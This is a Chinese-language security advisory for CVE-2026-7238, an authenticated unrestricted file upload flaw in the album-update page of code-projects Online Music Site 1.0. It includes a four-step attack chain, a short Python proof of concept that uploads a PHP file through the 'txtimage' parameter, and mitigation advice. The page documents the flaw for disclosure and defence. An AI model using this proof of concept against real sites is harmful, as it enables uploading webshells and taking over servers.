IPBUF安全漏洞报告
English
CVE-2026-7238 CVSS 4.7 中危

CVE-2026-7238 Online Music Site文件上传漏洞

披露日期: 2026-04-28
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7238
漏洞类型
文件上传漏洞
CVSS评分
4.7 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
code-projects Online Music Site

相关标签

文件上传任意文件上传Remote Code ExecutionOnline Music SiteCVE-2026-7238

漏洞概述

code-projects Online Music Site 1.0版本中存在一处安全缺陷。该漏洞源于/Administrator/PHP/AdminUpdateAlbum.php文件未能正确处理txtimage参数,导致出现不受限制的文件上传问题。尽管需要高权限,但远程攻击者可利用此漏洞上传恶意文件,进而对系统的机密性、完整性和可用性造成低程度影响。

技术细节

该漏洞位于Online Music Site 1.0的专辑更新功能模块中。受影响的文件为/Administrator/PHP/AdminUpdateAlbum.php。在处理用户提交的专辑更新请求时,程序未对参数txtimage进行严格的文件类型、扩展名及内容验证。攻击者需首先拥有系统的高权限账户(如管理员),随后通过发送特制的HTTP POST请求向该接口上传恶意文件(如WebShell)。由于缺乏安全限制,服务器会将文件保存至Web目录。攻击者随后可通过浏览器访问该文件,从而在服务器端执行任意代码,导致系统面临被完全控制的风险。

攻击链分析

STEP 1
1. 权限获取
攻击者需要获取目标系统的高权限账户(管理员权限),因为CVSS向量显示PR:H。
STEP 2
2. 构造请求
攻击者构造针对/Administrator/PHP/AdminUpdateAlbum.php的HTTP POST请求,在txtimage参数中包含恶意文件。
STEP 3
3. 上传文件
服务器接收请求,由于未对txtimage参数进行有效验证,将恶意文件保存到服务器可访问目录。
STEP 4
4. 执行攻击
攻击者通过URL访问上传的文件,触发恶意代码执行,导致数据泄露或篡改。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://example.com/Administrator/PHP/AdminUpdateAlbum.php" # Malicious file to upload (PHP shell) files = { 'txtimage': ('evil.php', '<?php phpinfo(); ?>', 'application/octet-stream') } # Data required for the request (adjust based on actual form requirements) data = { 'id': '1', 'submit': 'Update' } # Send the request response = requests.post(url, files=files, data=data) if response.status_code == 200: print("Exploit successful. File uploaded.") else: print("Exploit failed.")

影响范围

code-projects Online Music Site 1.0

防御指南

临时缓解措施
建议立即限制对/Administrator目录的访问权限,仅允许可信IP访问。同时,检查服务器Web目录中是否存在可疑的新增文件,并立即删除。在官方修复补丁发布前,应暂停使用该产品的专辑更新功能。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表